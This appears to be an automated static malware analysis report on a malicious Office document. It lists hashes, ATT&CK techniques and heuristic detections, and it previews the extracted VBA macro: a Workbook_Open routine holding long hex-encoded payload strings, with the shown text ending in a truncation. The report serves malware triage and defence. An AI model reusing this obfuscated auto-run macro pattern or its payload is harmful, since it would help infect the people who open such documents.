Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3c4d7a207e152314…

MALICIOUS

Office (OLE)

75.0 KB Created: 2018-02-27 03:30:00 Authoring application: Microsoft Office Word First seen: 2021-05-23
MD5: 3cc52fcc9a4f6663400c6508ed4f580b SHA-1: ea20f04c1daf5374ecd1b761b39e2af1a4d45bcb SHA-256: 3c4d7a207e1523143146c4d6ac22d9cee05897c8a7a2217a00578659a2014c65
264 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an Office document containing VBA macros, specifically a Workbook_Open macro that executes a Shell() command. This indicates the document is designed to run arbitrary code upon opening, likely to download and execute a secondary payload. The presence of the 'macros.bas' file and the critical heuristic firings strongly suggest malicious intent.

Heuristics 8

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13468 bytes
SHA-256: c9644f19ff9499edcda906f29114920c7d555b92da455506f9f2806ec8200b60
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 46 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

Sub Workbook_Open()
Dim ECB_S As String
ECB_S = "6560A033606660816D606D60606087605660604887606064603E2845606F60607D6050606060605A607260606022602874608C3D60606A60608B5E60606048894A607B604D8F3243609D609860236627606060279961565160282A7C60604E604A6960606060606A4F3D2260376046576040234260604A2C458660606C6F996F6"
Dim IRM_ALL As String
IRM_ALL = "A558080606037764F333A5060606F5683602F60297A60489E60A06060606060A96060677E606060606075533760476061606660705960602C607B8E506B6053456091608660605D602E60606060899B606460605F605860609D73769174607A75432E6F31605B6080297962607F5A604F6060603360696060607F606065874B4F"
Dim TC_FW As String
TC_FW = "8E973B8B602A60545760606063604860A0606062507B4D287251415D34605060323597606060862B606060395C7660605F607D5E6060603460913B6F889760343B60606083922143432A606028226F4F606360816059604C606060756060604F6025413D6060605B3C602C512C604260724660787C606060606086959E6024605"
Dim BM_Y As String
BM_Y = "37B6D6060609E3E604160606054608B906660605F744960603F246060996090293960258F49606060604D60609A2E6025595E7B60605260036060899B60716060642287223D60609B9F60603D5C606060957552609732819C606060607D7B60604050562D60233D82604780606087457A60265F402A5D536060786060603F4460"
Dim MTR_TMK As String
MTR_TMK = "60602C75A0469359603E706048244060607560603660238C6060609D60295C6058607B6060602770606060847597315091606060603972349C60747E689660717A6024604660608D4A27606067772F8C60608D275960629F602D60746060602C603360602D8A6B2E57606033609E56936060602A6038606060603A60819260819"
Dim SG_F As String
SG_F = "660547C7E80486E7F60254F6069607A60346060224860834F608A5239604243607C602237676060826024926075606360607E608A9495596050603C676060609D7386606489603F60774460606060609C46606B6A608F603E38606067852A6060728D7A6960603E71604B76492E4D60606060538C602C4671605A6F603A603D21"
Dim GVY_FV As String
GVY_FV = "4B816043606096603F3C606060603A60564B3C603A7B82546060A0604B57302F7660606060606026606060605460728255796094227B3126426060603260602C608D604B90605E7C3660996091218A603F726072602D606060346060602260606F426057608760396092606060609B736060906093606060594A60433B9760606"
Dim PWX_BN As String
PWX_BN = "06860608D6060426075446060602150567C9697604860604E9E6060774260465E54922B32816060606A80308F602242606256375B606056605F4E607953535060608633603F6091606060607460608D603023606060834260607E6037517E604C604C608C709A606060609F627F606072916060607A4060606060843060439160"
Dim D_USA As String
D_USA = "60609D60956060606060609D60606060607782602C326033603760346092606060544760984123219B4C5B3056604023846060802D92606060922A6055302460609A6060696074823C6060602E8160317D6038426060416060606060604B2D5B315D763A3B3C556060342A96318860607560605160516060608B8D606060446D6"
Dim J_A As String
J_A = "0626060446051602E6047A060603F604180604573823E936060602A978799603BF7602A6092606E60536063609960609D643E6048606091605C60604060609651604337608F2160506850602C605360447C70603F60526049576095443449608568636086606060712E605C626050606060607364603260609EA0582383943D3F"
Dim YT_P As String
YT_P = "9F76FD9E6060606060322760797528766038608D60579360603D9860603D60A08C2D492994606060216060454C5160606025693293604A60608D553860999360606960A060516024576060606068607B6060602D60608F7D28929B4B60784360776085608E81395790786060609C604A7B6060266060865843606082607260556"
Dim SFN_OZB As String
SFN_OZB = "060608C5F50609B6060839C9560607160963E60606060606C607A60604F6E60605C60606A8C4D55236060315B312A6060602E6060608C83602760544E60606960605060605F8160606060603FEE607360496083365B606860604677606085608049603B606C60566060776065609A496089606060609C609A5B6E4E8C606F4C84"
Dim LG_A As String
LG_A = "8560593260464D6060636060604E604775602C624E6060609360816F608A399F35566078606060344674606C60604060667D60416060936B2B6066485360466085606065606072607E609C5C606041296B6060605390302D6060956060606052604860976060606060606060609E274A739F606086605660606060608B43602A6
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.